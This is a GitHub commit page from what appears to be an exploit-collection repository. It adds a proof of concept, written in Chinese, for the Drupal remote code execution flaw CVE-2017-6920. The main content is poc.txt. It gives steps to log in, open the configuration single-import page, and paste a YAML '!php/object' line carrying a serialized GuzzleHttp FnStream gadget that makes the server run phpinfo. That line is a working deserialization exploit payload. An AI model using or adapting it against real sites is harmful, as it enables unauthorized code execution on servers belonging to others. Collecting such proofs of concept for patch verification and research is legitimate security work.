Skip to content

Commit

Permalink
Merge pull request #1 from rerestst/master
Browse files Browse the repository at this point in the history 
cms-hunter Drupal远程代码执行漏洞(CVE-2017-6920)
  • Loading branch information
@exp-db
exp-db authored Jul 17, 2017
2 parents 1899241 + 781fb9f commit 0bf40f9
Show file tree
Hide file tree
Showing 3 changed files with 7 additions and 0 deletions.
Binary file added Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/1.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/2.png
View file
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
7 changes: 7 additions & 0 deletions Drupal/Drupal远程代码执行漏洞(CVE-2017-6920)/poc.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,7 @@
在/user/login登陆后
访问http://xx.xx.xx.xx/admin/config/development/configuration/single/import

Configuration type:Simple configuration
Configuration name:随意填写
Paste your configuration here填写以下poc
!php/object "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\0GuzzleHttp\\Psr7\\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"

0 comments on commit 0bf40f9

Please sign in to comment.